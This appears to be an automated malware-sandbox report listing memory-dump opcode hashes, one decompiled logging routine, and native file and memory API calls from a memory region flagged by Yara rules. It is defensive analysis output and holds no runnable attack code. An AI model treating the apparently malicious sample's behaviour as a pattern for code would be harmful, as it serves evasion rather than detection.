                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                          • Instruction ID: b459bea2cf4d476219c6cd755c1ee61c8cd5a467063be567acdacb673d6bf4a1
                                                          • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                                                          • Instruction Fuzzy Hash: 10D0A731401185B9DF01AF38C1147683B71BB44308F5C1055A801C5452C3354B09C601
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                          • Instruction ID: 261f311bdc426b9fb7f1c9344cd4bfd926a29601b6a7e3672b7e9fced643cc83
                                                          • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                          • Instruction Fuzzy Hash: D6C08C31380A02AAFB226F24CD01B003AA4BB50B05F4400A06300DA0F0EB78DA01E600
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                          • Instruction ID: 446234599ff33a3d4e231b3d71c452f239bbaff3da7513ed172de107cc855068
                                                          • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                                          • Instruction Fuzzy Hash: 82C08C37080248BBCB127F85CC00F067F2AFBA4B60F008010FA084B5B0C632EA70EB84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                          • Instruction ID: 5c0b2a1202e7d8d98d6b8698d09c4d5c8b2658e7f45ffdaa6f37cc981731f433
                                                          • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                          • Instruction Fuzzy Hash: 4BC08C33080248BBC712AE45DC00F017B29E7A0B60F000020B6040A5608632ED60D588
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                          • Instruction ID: 8679199f2e3f2e1981dc9bd1effc0ba7afcba82d61ff4a19c4423a9a85bebd8b
                                                          • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                          • Instruction Fuzzy Hash: 50C08C32080248BBC7127A49CD00F017B29EBA0B60F100020B6044A6618932E960D588
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                          • Instruction ID: 685f1589987143a86f506287388d7aa99367a055404dc3b8bd1ce0d43830381b
                                                          • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                          • Instruction Fuzzy Hash: 58C02B71150440FBEF266F34CD00F147254F700B21F6803547220C54F0E6289D00E100
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                          • Instruction ID: 550b104d648f57671a5b642b5ed56ee5765dbfebe0e58bc322edbb5607463549
                                                          • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                          • Instruction Fuzzy Hash: 6EC08C701411845AEB2A770CCE28B203A60AF08708F58019CAB01894A2C368EA23C208
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                          • Instruction ID: 1f12a9d4b42f9001355b4ffb75117b9a878de514c4bea083d13ed1576ccafa88
                                                          • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                          • Instruction Fuzzy Hash: 34B092353029808FCE16EF18C080B1533F4BB44B40B9400D0E400CBA21D229E9008900
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                          • Instruction ID: 797cd59f33c6ab623a03bb1768bb722a7310da59ae5b74ecde8d4a524dc5e887
                                                          • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                          • Instruction Fuzzy Hash: 03B01232C10441CFCF02EF44CA50B297731FB00750F0944D1900177930C228ED01CB40
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f53722d7b4a48509dfbb899b45a0c8c49ea1b55b9ddaf3a6085cd23db2c7db6a
                                                          • Instruction ID: dffa49b9d7636cb1ba132b744eef22e789566e3bbd3d4a1030e5f3d7db868264
                                                          • Opcode Fuzzy Hash: f53722d7b4a48509dfbb899b45a0c8c49ea1b55b9ddaf3a6085cd23db2c7db6a
                                                          • Instruction Fuzzy Hash: CE9002A121100053D144619944547460045E7E1345F51C122A3248674CC5699D656165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9d1be75e5dc456e6658d41af0d7569c22b9319767c7788793e20d74e84b5faa7
                                                          • Instruction ID: 689198547a910082878e58cf9081c05cbe325f6f4ed0c89f6bdc92542879ddc7
                                                          • Opcode Fuzzy Hash: 9d1be75e5dc456e6658d41af0d7569c22b9319767c7788793e20d74e84b5faa7
                                                          • Instruction Fuzzy Hash: 669002A120140413D180659948546470005E7D0346F51C121A3158675ECA699D557175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a5b557384ce8c797fdf6ca82d363269af6434b821a68287610396a3b460b5cca
                                                          • Instruction ID: 2305f73e60894125e98cca71dbde7d3e66c805ef02808a003e3773a5a8fdb7ce
                                                          • Opcode Fuzzy Hash: a5b557384ce8c797fdf6ca82d363269af6434b821a68287610396a3b460b5cca
                                                          • Instruction Fuzzy Hash: AF90026130100413D142619944646460009E7D1389F91C122E2518675DC6659A57B172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6a0878deeb8abf307d1c4f849977cc3e2ff5ca22055a86281b47377c2fd67bdd
                                                          • Instruction ID: d34b879d7821a983f2f2c5114a90c0e991a06dd03389d63eb18a48f6ccdac25b
                                                          • Opcode Fuzzy Hash: 6a0878deeb8abf307d1c4f849977cc3e2ff5ca22055a86281b47377c2fd67bdd
                                                          • Instruction Fuzzy Hash: 8390027124100413D181719944546460009F7D0385F91C122A1518674EC6959B5ABAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4a008325b454df7b61ee21121d145ff8b2e6e4b83c7068e63cee39816b3c7920
                                                          • Instruction ID: 3c7880168d590e763317591bb39ff45ba1fcc34d33571771676cd1740ab48e66
                                                          • Opcode Fuzzy Hash: 4a008325b454df7b61ee21121d145ff8b2e6e4b83c7068e63cee39816b3c7920
                                                          • Instruction Fuzzy Hash: F89002A1601140534580B19948544465015F7E1345391C231A1548670CC6A89959A2A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 750071cfca3dbd5e2220c06b759477eb79589adaa8a7fe61cb7a28125c24c3e0
                                                          • Instruction ID: e55d57cf6a126e9df53e976fb57caf20ac77f9b21a2c30f564e0988aef4455da
                                                          • Opcode Fuzzy Hash: 750071cfca3dbd5e2220c06b759477eb79589adaa8a7fe61cb7a28125c24c3e0
                                                          • Instruction Fuzzy Hash: EC90027120144013D1807199849464B5005F7E0345F51C521E1519674CC655995AA261
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4eaf6defd6c21993f30de5e884dd5f6a7c5210f2e293e28ad1e081dd3490efab
                                                          • Instruction ID: fd32d05b59c35c40d04b9f6bbc2750c9195285896f2d002ff03d6c69bc0de20e
                                                          • Opcode Fuzzy Hash: 4eaf6defd6c21993f30de5e884dd5f6a7c5210f2e293e28ad1e081dd3490efab
                                                          • Instruction Fuzzy Hash: FF90026124100813D180719984647470006E7D0745F51C121A1118674DC6569A6976F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6c7cac627e1e1a148c192fc41a1d57b27c69519ad37455efbf84dc200a136116
                                                          • Instruction ID: 7fae08143f93e77423d36bbb9b5d82df5a41481bbc84973b44ba97bd56db8ea3
                                                          • Opcode Fuzzy Hash: 6c7cac627e1e1a148c192fc41a1d57b27c69519ad37455efbf84dc200a136116
                                                          • Instruction Fuzzy Hash: 3190026120144453D18062994854B4F4105E7E1346F91C129A524A674CC95599596761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1d273ec761a8b327587204cffbd1499c5948bc1eb9fb50a7828a0c01ee79a05
                                                          • Instruction ID: 036d291db51742af1ed32ff5b0ab64b01c4bf1acf24e822bfaef0fb9e0aa5791
                                                          • Opcode Fuzzy Hash: c1d273ec761a8b327587204cffbd1499c5948bc1eb9fb50a7828a0c01ee79a05
                                                          • Instruction Fuzzy Hash: 0190027120140413D140619948587870005E7D0346F51C121A6258675EC6A5D9957571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00e0930f49d199b95ca7e907fc0aa44739cdf7035fb414306671dbbf1140dabd
                                                          • Instruction ID: f43824dc9fbf401052bfec504ebd0c467e0b872189b33009a38c5fa331863745
                                                          • Opcode Fuzzy Hash: 00e0930f49d199b95ca7e907fc0aa44739cdf7035fb414306671dbbf1140dabd
                                                          • Instruction Fuzzy Hash: 7790027120100813D144619948546C60005E7D0345F51C121A7118775ED6A599957171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e940eece4d8cbbd0b4e714e79f8ea607d511e0fb3fafdc17ab5b2b6c783687f1
                                                          • Instruction ID: ba421a06fea494ec333a0bc63868bae4d6ada5436855ad1c3244aa92ce5934ca
                                                          • Opcode Fuzzy Hash: e940eece4d8cbbd0b4e714e79f8ea607d511e0fb3fafdc17ab5b2b6c783687f1
                                                          • Instruction Fuzzy Hash: 499002E1201140A34540A2998454B4A4505E7E0345B51C126E2148670CC5659955A175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58ca9bb9f40194f33ac7339956e4c1fbac29a5e05c1a98d1750d076da8a44094
                                                          • Instruction ID: 3dc93bef069b8afb58c836f2cc8dcfe9675547df84a46d2a512b2938b28bf2ce
                                                          • Opcode Fuzzy Hash: 58ca9bb9f40194f33ac7339956e4c1fbac29a5e05c1a98d1750d076da8a44094
                                                          • Instruction Fuzzy Hash: B1900271A05000239180719948646864006F7E0785B55C121A1608674CC9949B5963E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f33cb1a7bea825f03c30fa0ffda5107d63600c02298a0b68a6170837877799f1
                                                          • Instruction ID: 1206567ea2d8c1da80c20c69177532061f465ad2a9737d651630db117971b8b8
                                                          • Opcode Fuzzy Hash: f33cb1a7bea825f03c30fa0ffda5107d63600c02298a0b68a6170837877799f1
                                                          • Instruction Fuzzy Hash: EB900265221000130185A599065454B0445F7D6395391C125F250A6B0CC66199696361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bfba020f29ca244552cbab3f29e110dda458b32d91b2329efdea16e92e39a362
                                                          • Instruction ID: 92a6907ef679aabf82d5b4364c2f64135ae406f5aacd847751f225b3590dbdd7
                                                          • Opcode Fuzzy Hash: bfba020f29ca244552cbab3f29e110dda458b32d91b2329efdea16e92e39a362
                                                          • Instruction Fuzzy Hash: 50900271301000639540A6D95854A8A4105E7F0345B51D125A5108674CC59499656161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f34689c50679c0800580f5b8f89fe93d321289b53835f2866a8a0788f3676038
                                                          • Instruction ID: 1181145316183587c5d9282c33bbdb605290397df34962c66d0ab50f96322902
                                                          • Opcode Fuzzy Hash: f34689c50679c0800580f5b8f89fe93d321289b53835f2866a8a0788f3676038
                                                          • Instruction Fuzzy Hash: F790026160500413D180719954687460015E7D0345F51D121A1118674DC6999B5976E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7079d1e53e5aa3a6ecb439369d39ffea7d4b7a54a2c760f7e6cbc06ed23d63df
                                                          • Instruction ID: f08cb9cf34f3dca49b36b545627860e6cb979b4382b4aa7e4f527138b33739f4
                                                          • Opcode Fuzzy Hash: 7079d1e53e5aa3a6ecb439369d39ffea7d4b7a54a2c760f7e6cbc06ed23d63df
                                                          • Instruction Fuzzy Hash: 6790027120100413D140619955587470005E7D0345F51D521A1518678DD69699557161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 432ef4c97a31aeaedd8f1eb2e443b5fa5871e0dfe30c8fb89aac189f512f33fe
                                                          • Instruction ID: a857d40eeb9624bb790e5465f7341ecfcf83b6f59db722861ed6d34642f59863
                                                          • Opcode Fuzzy Hash: 432ef4c97a31aeaedd8f1eb2e443b5fa5871e0dfe30c8fb89aac189f512f33fe
                                                          • Instruction Fuzzy Hash: 0B90027520504453D54065995854AC70005E7D0349F51D521A15186BCDC6949965B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b110be3d69d3c5ab7dcbeb8f1d81498733232f2bfcf9f7c8be3040649c2bb6d6
                                                          • Instruction ID: df774ccf58a61147d86c21aec467cec6538456e7631bb801a64c6d1d8cd457a7
                                                          • Opcode Fuzzy Hash: b110be3d69d3c5ab7dcbeb8f1d81498733232f2bfcf9f7c8be3040649c2bb6d6
                                                          • Instruction Fuzzy Hash: 6A90026120504453D14065995458A460005E7D0349F51D121A21586B5DC6759955B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 09cd244e87e1564cec8b31ca8677d9bccca9c9601442b29b91c62f338d2fb759
                                                          • Instruction ID: fa294a71b5fadb157bcf6d435f9f3c7f75f39901321c2dd465270440a2fab05c
                                                          • Opcode Fuzzy Hash: 09cd244e87e1564cec8b31ca8677d9bccca9c9601442b29b91c62f338d2fb759
                                                          • Instruction Fuzzy Hash: E690027120100853D14061994454B860005E7E0345F51C126A1218774DC655D9557561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67a928889a5ac181a99e4bc2b6d43e59cb0b38ca2afa798896ee10bd3394e018
                                                          • Instruction ID: ae8e6288eb31b651a459c6325385801daa0776e1311a2725ed3d9840d8144bd0
                                                          • Opcode Fuzzy Hash: 67a928889a5ac181a99e4bc2b6d43e59cb0b38ca2afa798896ee10bd3394e018
                                                          • Instruction Fuzzy Hash: 8290027160500813D190719944647860005E7D0345F51C121A1118774DC7959B5976E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2d90d1ac214318c7fad468a8094cdac92962da56c2d8bd58fd84f66347d601a2
                                                          • Instruction ID: a71990779f3becf56faa2b65f58759ec66a1684423345df33382345bbc8e0d14
                                                          • Opcode Fuzzy Hash: 2d90d1ac214318c7fad468a8094cdac92962da56c2d8bd58fd84f66347d601a2
                                                          • Instruction Fuzzy Hash: AC90027120504853D18071994454A860015E7D0349F51C121A11587B4DD6659E59B6A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 8186937a29bdc5047a66780246883f3527527ca2e7f64cdf9c23d7d2462aa5d7
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E018FFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                          				void* _t7;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t10;
                                                          				intOrPtr* _t12;
                                                          				intOrPtr* _t13;
                                                          				intOrPtr _t14;
                                                          				intOrPtr* _t15;
                                                          
                                                          				_t13 = __edx;
                                                          				_push(_a4);
                                                          				_t14 =  *[fs:0x18];
                                                          				_t15 = _t12;
                                                          				_t7 = E018ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                          				_push(_t13);
                                                          				E018F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                          				_t9 =  *_t15;
                                                          				if(_t9 == 0xffffffff) {
                                                          					_t10 = 0;
                                                          				} else {
                                                          					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                          				}
                                                          				_push(_t10);
                                                          				_push(_t15);
                                                          				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                          				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                          				return E018F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                          			}










                                                          0x018ffdda
                                                          0x018ffde2
                                                          0x018ffde5
                                                          0x018ffdec
                                                          0x018ffdfa
                                                          0x018ffdff
                                                          0x018ffe0a
                                                          0x018ffe0f
                                                          0x018ffe17
                                                          0x018ffe1e
                                                          0x018ffe19
                                                          0x018ffe19
                                                          0x018ffe19
                                                          0x018ffe20
                                                          0x018ffe21
                                                          0x018ffe22
                                                          0x018ffe25
                                                          0x018ffe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018FFDFA
                                                          Strings
                                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018FFE2B
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018FFE01
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.763909960.0000000001840000.00000040.00000001.sdmp, Offset: 01840000, based on PE: true
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                          • API String ID: 885266447-3903918235
                                                          • Opcode ID: 4cafa2d4f4c1dc91b23c1448a007dcc58adc5a7101349ed55258e323f641e8fa
                                                          • Instruction ID: 3e84afe5795a4fe1d255d2bc0781a26f444db48d02001793ff8c7ee074ed6e9f
                                                          • Opcode Fuzzy Hash: 4cafa2d4f4c1dc91b23c1448a007dcc58adc5a7101349ed55258e323f641e8fa
                                                          • Instruction Fuzzy Hash: 03F0FC33540101BFE7201A49DC01F237F5ADB44730F140318F714951D1DA62FA3086F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Executed Functions

                                                          APIs
                                                          • NtCreateFile.NTDLL(00000060,00000000,.z`,032F3B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,032F3B87,007A002E,00000000,00000060,00000000,00000000), ref: 032F81FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateFile
                                                          • String ID: .z`
                                                          • API String ID: 823142352-1441809116
                                                          • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction ID: e8641ecaa7bdc092920e09c550814d6c5cbcf10874ea14e382973a6a46b1b030
                                                          • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                          • Instruction Fuzzy Hash: 57F0B2B2210208AFCB08CF88DC84EEB77ADAF8C754F158248BA0D97240C630E8518BA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(032F3D42,5E972F59,FFFFFFFF,032F3A01,?,?,032F3D42,?,032F3A01,FFFFFFFF,5E972F59,032F3D42,?,00000000), ref: 032F82A5
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                          • Instruction ID: 4a70a3218eb08e33ce8e7b7646cf910f13a47373162eef06c283fb1d04e7444a
                                                          • Opcode Fuzzy Hash: c7edd4fd4d06aa36a8b3e72857365d84c1e528433a379cc5388247f8ffbec704
                                                          • Instruction Fuzzy Hash: 9E110976210204AFCB14DF98CC84EEBB7ADEF8C754F058658BA1D97241C630E911CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtReadFile.NTDLL(032F3D42,5E972F59,FFFFFFFF,032F3A01,?,?,032F3D42,?,032F3A01,FFFFFFFF,5E972F59,032F3D42,?,00000000), ref: 032F82A5
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction ID: c9e16bf48964df74fd28a3794c97c24d498b2feb8289b3a2e34e21c412143842
                                                          • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                          • Instruction Fuzzy Hash: F3F0A4B6210208AFCB14DF99DC80EEB77ADAF8C754F158258BA1D97241DA30E8518BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,032E2D11,00002000,00003000,00000004), ref: 032F83C9
                                                          Memory Dump Source
                                                          • Source File: 0000000D.00000002.918415309.00000000032E0000.00000040.00000001.sdmp, Offset: 032E0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: 7ca60511e67bd80e9fdd794548457939173102ca0c3c1b7c239d611a4510c0bf
